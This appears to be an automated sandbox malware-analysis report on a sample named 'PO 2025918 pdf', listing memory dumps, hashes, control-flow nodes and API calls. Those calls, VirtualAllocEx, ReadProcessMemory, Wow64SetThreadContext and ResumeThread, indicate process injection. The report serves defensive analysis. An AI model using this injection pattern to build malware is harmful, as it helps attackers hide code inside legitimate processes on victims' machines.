                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 56b8a5e76d7a9e6e95721e215b6246b125d967d52b5fbf670ff18841f7c30fe8
                                                                                • Instruction ID: b9a4cae80b73f3ba0cdf7a96e27e70f7f281c36853569753ff29a2e8690e95b6
                                                                                • Opcode Fuzzy Hash: 56b8a5e76d7a9e6e95721e215b6246b125d967d52b5fbf670ff18841f7c30fe8
                                                                                • Instruction Fuzzy Hash: AA2139719003098FDB10DFAAC4857AEBBF4EF58314F54842AD559A7241C7789944CFA1

                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01A0D586,?,?,?,?,?), ref: 01A0DA4F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 6f011586380666b62f33ff9311368a65d172e96191b5a52016688d88071a9ea0
                                                                                • Instruction ID: 0e334b39adf8c77e7fc3d14202a2b8778ab37d387a4ed0e6547b90175081cbbe
                                                                                • Opcode Fuzzy Hash: 6f011586380666b62f33ff9311368a65d172e96191b5a52016688d88071a9ea0
                                                                                • Instruction Fuzzy Hash: AF21E5B59002489FDB10CF9AD584AEEBFF5EB48310F14841AE918A3350D378A940CFA0
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0932FCB0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: c25ab7490851c412bd5ab48fc23761e9050c517ceee511d4848cdc8854ec5ef8
                                                                                • Instruction ID: a79c8a1b352e1ca2dfb4fcd9b56c1a61a9630878276a6ddb742690a3f19c96e2
                                                                                • Opcode Fuzzy Hash: c25ab7490851c412bd5ab48fc23761e9050c517ceee511d4848cdc8854ec5ef8
                                                                                • Instruction Fuzzy Hash: 952116B5C003599FDB10DFAAC981AEEFBF5FF48310F50842AE919A7250C7389544DBA0
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01A0D586,?,?,?,?,?), ref: 01A0DA4F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: bb559b7f5a46bf007e64ded458803c5c486382b16a3ff5dd9ee0687957e24ca7
                                                                                • Instruction ID: 2955cf3ddc032a6d95a130cf6210d283c357fe74b3dd044e66f0ef6d66c16625
                                                                                • Opcode Fuzzy Hash: bb559b7f5a46bf007e64ded458803c5c486382b16a3ff5dd9ee0687957e24ca7
                                                                                • Instruction Fuzzy Hash: EE21E3B5D002489FDB10CF9AD584ADEBFF9FB48310F14841AE918A3350D378A940CFA1
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0932FA26
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: ab822d18837fbd9bb702e891a9ce35bc729b0222504771d06aaf6f0b86d2c334
                                                                                • Instruction ID: a472ad72322c8450f0f1f092fad3786f740003ce7c6bd0b8a8ec06d38b672449
                                                                                • Opcode Fuzzy Hash: ab822d18837fbd9bb702e891a9ce35bc729b0222504771d06aaf6f0b86d2c334
                                                                                • Instruction Fuzzy Hash: 1F2129B1D003098FDB10DFAAC4857EEBBF4EF48314F14842AD559A7241DB789984CFA1
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0932FCB0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 0900fd92555e8b5800f9d32c79a7e58d10b0a18019c6ebd71eff889670fa7dfe
                                                                                • Instruction ID: 2337b2db65250d007b8842cdf343ae06adfd3a98022ef471f2308547578b13fb
                                                                                • Opcode Fuzzy Hash: 0900fd92555e8b5800f9d32c79a7e58d10b0a18019c6ebd71eff889670fa7dfe
                                                                                • Instruction Fuzzy Hash: BD2114B5C002599FDB10DFAAC980AEEBBF5FF48310F10842AE919A7250C7389940CBA0
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0932FAEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 839cbcb0d6afc7f4c808a31b443bdd219ed24809c1fb5808a70d6f0b40e39525
                                                                                • Instruction ID: c70bef9f15d92eefd0e6a870ea86990a4469454be5c4dbf970aafa8e02162615
                                                                                • Opcode Fuzzy Hash: 839cbcb0d6afc7f4c808a31b443bdd219ed24809c1fb5808a70d6f0b40e39525
                                                                                • Instruction Fuzzy Hash: 451114B58002499BDB10DFAAC845AEEBFF5EF48320F14881AE519A7250CB79A544CFA1
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0932FAEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 9d078547707f4921a60bc51de6e206eae26d05f18561e726a0ad7a4ca2930eb4
                                                                                • Instruction ID: 56ca66c1a93e96284c8cfc94f5d4613f258df64b7f9b0b6bb9f060a49f233c90
                                                                                • Opcode Fuzzy Hash: 9d078547707f4921a60bc51de6e206eae26d05f18561e726a0ad7a4ca2930eb4
                                                                                • Instruction Fuzzy Hash: AA1149758002499FDB10DFAAC845AEFFFF5EF48320F108419E519A7250C779A540CFA0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: b05a2412d9b3b603e0d7d4ba79a3d1791d12e61b4047b1095fab0d9b23e838cb
                                                                                • Instruction ID: 7d9ff9dbbfb1246a517c430c878bf851cf1b8d733304cc612da9fea8bc1e4b73
                                                                                • Opcode Fuzzy Hash: b05a2412d9b3b603e0d7d4ba79a3d1791d12e61b4047b1095fab0d9b23e838cb
                                                                                • Instruction Fuzzy Hash: 6B1128B59002498FDB20DFAAD4457AFFBF5EF88324F248419D519A7240CB79A544CFA0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 6d55fe4fef9e88b204f087fd58ff8921167767c0110915a2b1a3a7cc0b6674ee
                                                                                • Instruction ID: 07e82d43ac6fe15685e5776f9e38cce246d11273359f151adf05beaec9fb73e0
                                                                                • Opcode Fuzzy Hash: 6d55fe4fef9e88b204f087fd58ff8921167767c0110915a2b1a3a7cc0b6674ee
                                                                                • Instruction Fuzzy Hash: 1A1125B19002498BDB20DFAAC4457AEFBF5EF88320F208419D519A7240CB79A944CFA0
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 01A0B626
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 8adfff82eb3721ff9c49e96c52845bf44cd4eab5a2ea0fa0eeb9dc41351f9673
                                                                                • Instruction ID: 246f7e08a48631b6482026c71bce784c2fddaef2d4c2487ad564c0375ff11cfd
                                                                                • Opcode Fuzzy Hash: 8adfff82eb3721ff9c49e96c52845bf44cd4eab5a2ea0fa0eeb9dc41351f9673
                                                                                • Instruction Fuzzy Hash: E3110FB5C003498FDB10DF9AD944A9EFBF4EF88310F10841AD519B7240C379A545CFA1
                                                                                APIs
                                                                                • PostMessageW.USER32(?,?,?,?), ref: 07C228AD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2223192289.0000000007C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7c20000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: da2823de5b29704cc7c9716268d34f8939fe13c26dbec8ea7d9c99a1538f49fd
                                                                                • Instruction ID: 62d51cd9b790ff1600fedc4d17edc16185759a92e501fa122b4275d7d322d7f1
                                                                                • Opcode Fuzzy Hash: da2823de5b29704cc7c9716268d34f8939fe13c26dbec8ea7d9c99a1538f49fd
                                                                                • Instruction Fuzzy Hash: E51100B68003499FDB10DF99D985BDEFBF8FB58320F10881AD558A7200C379A584CFA1
                                                                                APIs
                                                                                • PostMessageW.USER32(?,?,?,?), ref: 07C228AD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2223192289.0000000007C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7c20000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: 6a18086ecfce1c264a428703bb0bf0885ccdbf283ed4f4f5ab0975228facd3e2
                                                                                • Instruction ID: 0d12195cb7a240cee990d013ae28bbc337fb0a7f10ea69891f063fc5a13a5d52
                                                                                • Opcode Fuzzy Hash: 6a18086ecfce1c264a428703bb0bf0885ccdbf283ed4f4f5ab0975228facd3e2
                                                                                • Instruction Fuzzy Hash: 5D11E5B58003599FDB10DF9AD485BDEFBF8FB48310F108419D558A7200C379A544CFA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'jq
                                                                                • API String ID: 0-3676250632
                                                                                • Opcode ID: 2993504930e45f74c8ad023be92f658bbad5df93e147c28d0a7c3d3ca167caba
                                                                                • Instruction ID: 578479e0838c9a19d26b3e9081fea77d93847484d07f9d0164b2545082cfda60
                                                                                • Opcode Fuzzy Hash: 2993504930e45f74c8ad023be92f658bbad5df93e147c28d0a7c3d3ca167caba
                                                                                • Instruction Fuzzy Hash: 4F6118B0A112098FE748DF6AE951AAA7FFAFFC8300F14D16AD1049B264DF345806CF90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'jq
                                                                                • API String ID: 0-3676250632
                                                                                • Opcode ID: 3f41c22f6302da79f58efde8f7f1495bf0a3a9467f970f2adb5d36a959e8b63b
                                                                                • Instruction ID: 2768905bef18eb8da0ce2016dfd078f0d2daf900d2f694117eaefbae5ac58d9f
                                                                                • Opcode Fuzzy Hash: 3f41c22f6302da79f58efde8f7f1495bf0a3a9467f970f2adb5d36a959e8b63b
                                                                                • Instruction Fuzzy Hash: AA61F8B0A152098FE749DF6AE941AAA7BFBFBC8300F14D52AD1049B264DF745806CF94
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2223192289.0000000007C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7c20000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e2a47a561b7dbb31b158924c318049d36745a62e07bd8529d932ff24864c072e
                                                                                • Instruction ID: c76139c24aac078f060845f13c7291849ce87c17f6e59ab9a64cc23df4ed78c6
                                                                                • Opcode Fuzzy Hash: e2a47a561b7dbb31b158924c318049d36745a62e07bd8529d932ff24864c072e
                                                                                • Instruction Fuzzy Hash: EBC1BCB0701B518FEB1ADB75C590B6EB7FAAF89700F148469D14ACB290CB34EE02D751
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a90d97a64f80113043f81c6674f523592bd25d029144797c2991d798ef3155fc
                                                                                • Instruction ID: f4846f81c7d762918ed0f2ffaaaefcbfe54167382c106ffea1da5ff09d2a6563
                                                                                • Opcode Fuzzy Hash: a90d97a64f80113043f81c6674f523592bd25d029144797c2991d798ef3155fc
                                                                                • Instruction Fuzzy Hash: ABE10B74E001298FDB14DFA9C580AAEFBB2FF89305F248169E415AB356D731AD41CFA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bd35c1efd9a35837ef7fa23ddb049527e6486b8db3ba2921e6d2b5137dc1dbdb
                                                                                • Instruction ID: cfffc8faef7d9e4129faf21114154d2d875f732aa495dd641e50529fc9bcf507
                                                                                • Opcode Fuzzy Hash: bd35c1efd9a35837ef7fa23ddb049527e6486b8db3ba2921e6d2b5137dc1dbdb
                                                                                • Instruction Fuzzy Hash: 6DE11A74E001198FDB14DFA8C580AAEFBB2FF89305F249169E519AB356D731AD41CFA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 461d4974ce64ad8774466fd9016caccc810c40662c5c6b1006f24615b47f19e7
                                                                                • Instruction ID: 879072f7872c5542c3cd0b823bd7a2aa72bfa6c75cbe39c410c04d2629077fd8
                                                                                • Opcode Fuzzy Hash: 461d4974ce64ad8774466fd9016caccc810c40662c5c6b1006f24615b47f19e7
                                                                                • Instruction Fuzzy Hash: 3EE1FA74E001198FDB14DFA9C580AAEFBB2FF89305F248169E515AB356D730AD41CFA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e3b0f74e305dab8503a8b13331775af4a56d36a2cf9a32c691ad9e5a9f65e005
                                                                                • Instruction ID: e3742554eeecb5fa3732315931e84aaa4e2d14c120539ec2aafff269d14f8ba2
                                                                                • Opcode Fuzzy Hash: e3b0f74e305dab8503a8b13331775af4a56d36a2cf9a32c691ad9e5a9f65e005
                                                                                • Instruction Fuzzy Hash: 16E1E974E001298FDB14DFA9C580AAEFBB2FF89305F248169E515AB356D731AD41CFA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cdc971cd5610a7240c2cdfecc986ead1d5a008d821ee0d1efd33b4e9eb67a6b9
                                                                                • Instruction ID: 05cf349cd128a5dedeacae8259768c787c8b581faaa516f3da912ef3eb648a44
                                                                                • Opcode Fuzzy Hash: cdc971cd5610a7240c2cdfecc986ead1d5a008d821ee0d1efd33b4e9eb67a6b9
                                                                                • Instruction Fuzzy Hash: 6CE10B74E001198FDB14DFA9C580AAEFBB2FF89305F248169E519AB355D734AD41CFA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0e16998a67470e6392c452b8ab0cc655a3922fa0a29bf95e13a53bd4a7db4ef0
                                                                                • Instruction ID: 56dd51dac55d6544c9be558807401ddfc2dca67cea9a9e7f98a04f5cf6eff43a
                                                                                • Opcode Fuzzy Hash: 0e16998a67470e6392c452b8ab0cc655a3922fa0a29bf95e13a53bd4a7db4ef0
                                                                                • Instruction Fuzzy Hash: 4BA16032E102068FCF16DFB8D98059EBBB2FF85300B15856AE905BB2A5DB35D956CB40
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 629f1badd5c64c02dc5908a14958bfcb11be9abfc3265e8968664082d3a285b6
                                                                                • Instruction ID: 4f94e561a09573f9b2e1b9af36419b0843dbc40339c354b3304430f0611f1903
                                                                                • Opcode Fuzzy Hash: 629f1badd5c64c02dc5908a14958bfcb11be9abfc3265e8968664082d3a285b6
                                                                                • Instruction Fuzzy Hash: AF91FF71D05228DFDF14CFA9D8847EEBBBABF49304F10906AE519A7262DB345A85CF40
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ca27f0b5f9af6fa3b5b23aa59b7db5666ad243589f795df6c43b55e57e3ede0e
                                                                                • Instruction ID: 57842ab51b26f1b519b41084721428141cf0b1c06996cfea564f707367b45c31
                                                                                • Opcode Fuzzy Hash: ca27f0b5f9af6fa3b5b23aa59b7db5666ad243589f795df6c43b55e57e3ede0e
                                                                                • Instruction Fuzzy Hash: 4A510874E002198FDB14DFA9C9806AEFBF2FF89305F248169D419AB356D7319A41CFA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7649d9bb32e3a7199cc22ec0c21669cadfe1b239fb8d73705151cbe702a140af
                                                                                • Instruction ID: 6edfbe4e329920d6f1e0cc2d0dff9786ae81a7ef17562878e75cd1c64052537d
                                                                                • Opcode Fuzzy Hash: 7649d9bb32e3a7199cc22ec0c21669cadfe1b239fb8d73705151cbe702a140af
                                                                                • Instruction Fuzzy Hash: 90513B74E0021A8BDB14DFA9C9806AEFBF2FF89304F24C169D418A7356D735A941CFA0

                                                                                Execution Graph

                                                                                Execution Coverage:1.3%
                                                                                Dynamic/Decrypted Code Coverage:4.8%
                                                                                Signature Coverage:8.8%
                                                                                Total number of Nodes:147
                                                                                Total number of Limit Nodes:10

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 73 417a63-417a7f 74 417a87-417a8c 73->74 75 417a82 call 42f643 73->75 76 417a92-417aa0 call 42fc43 74->76 77 417a8e-417a91 74->77 75->74 80 417ab0-417ac1 call 42e0f3 76->80 81 417aa2-417aad call 42fee3 76->81 86 417ac3-417ad7 LdrLoadDll 80->86 87 417ada-417add 80->87 81->80 86->87
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AD5
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 796422a0e03da6e05e870b9df345f99345e8cc58a3a3a3b03bc6c72230115a90
                                                                                • Instruction ID: 0800c33516af0022d0b17055a186c9f0e9460697c5db4936c8195cfb473c91ec
                                                                                • Opcode Fuzzy Hash: 796422a0e03da6e05e870b9df345f99345e8cc58a3a3a3b03bc6c72230115a90
                                                                                • Instruction Fuzzy Hash: E00175B1E0010DABDF10DBE1DC42FDEB378AF54308F4081A6E90897241F674EB588B55

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 99 42c9c3-42c9ff call 404993 call 42dbe3 NtClose
                                                                                APIs
                                                                                • NtClose.NTDLL(00424CF4,?,-665E6599,?,?,00424CF4,?,00009D57), ref: 0042C9FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 9b38cc4083fcf95519bbd2f222b190f3b983931ae5abd193463e60ae3ae6f940
                                                                                • Instruction ID: eb656e4eeb6cc65563beea3f5f9dfeb29813091517ec9c3f1aba9bd37f9daa79
                                                                                • Opcode Fuzzy Hash: 9b38cc4083fcf95519bbd2f222b190f3b983931ae5abd193463e60ae3ae6f940
                                                                                • Instruction Fuzzy Hash: 2CE04F756042147BD220AA6ADC41F9B775CDBC9714F508069FA0C67242C675791187B4

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 113 16d2b60-16d2b6c LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3ba9f0fcc7bc19f0458089a45cda1161002dd30b81ae155e293da09be22d61ad
                                                                                • Instruction ID: 7717d4a7af475cfb367eba90537a68cc4a00c137075e44ac92c6ad4b089dc974
                                                                                • Opcode Fuzzy Hash: 3ba9f0fcc7bc19f0458089a45cda1161002dd30b81ae155e293da09be22d61ad
                                                                                • Instruction Fuzzy Hash: 49900261203400034105755C4818617404E97E0201B55C121E5014A90EC52589916225

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 115 16d2df0-16d2dfc LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 114 16d2c70-16d2c7c LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 116 16d35c0-16d35cc LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • PostThreadMessageW.USER32(-4108694,00000111,00000000,00000000), ref: 0041432A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID: -4108694$-4108694
                                                                                • API String ID: 1836367815-789369925

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 14 417ae3-417aec 15 417ad1-417ad7 LdrLoadDll 14->15 16 417aee-417aef 14->16 19 417ada-417add 15->19 17 417af1-417af6 16->17 18 417a98-417aa0 16->18 20 417af8-417b08 17->20 21 417b0f 17->21 22 417ab0-417ac1 call 42e0f3 18->22 23 417aa2-417aad call 42fee3 18->23 20->21 24 417b11-417b29 21->24 22->19 31 417ac3-417ad0 22->31 23->22 24->24 29 417b2b-417b3b 24->29 31->15
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AD5
                                                                                Strings
